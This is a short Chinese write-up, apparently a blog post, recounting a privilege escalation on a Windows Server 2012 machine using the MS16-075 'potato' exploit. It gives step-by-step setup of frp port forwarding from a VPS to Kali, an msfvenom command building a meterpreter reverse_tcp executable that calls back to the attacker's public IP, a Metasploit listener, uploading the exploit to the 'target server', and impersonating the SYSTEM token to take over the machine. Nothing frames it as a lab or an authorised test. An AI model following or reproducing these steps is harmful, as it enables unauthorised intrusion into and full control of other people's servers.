记一次ms16075邪恶土豆提权windows2012服务器过程
匿名权限
2012服务器
服务器系统是window2012的
需要准备一台vps公网服务器,和一台kali虚拟机进行映射通信
kali设置frp代理规则
server填写公网服务器IP
然后在在VPS启动frp
Kali转发6666到公网的1234端口配合MSF进行反弹
开启kali的frp
由MSF生成木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=公网ip LPORT=6666 -f exe > /.exe
使用msf模块进行监听 multi/handler
上传ms16075文件,到目标服务器运行
Msf反弹成功
通过potato进行提权
提权命令:impersonate_token "NT AUTHORITY\SYSTEM"
发现提权成功
登录目标服务器
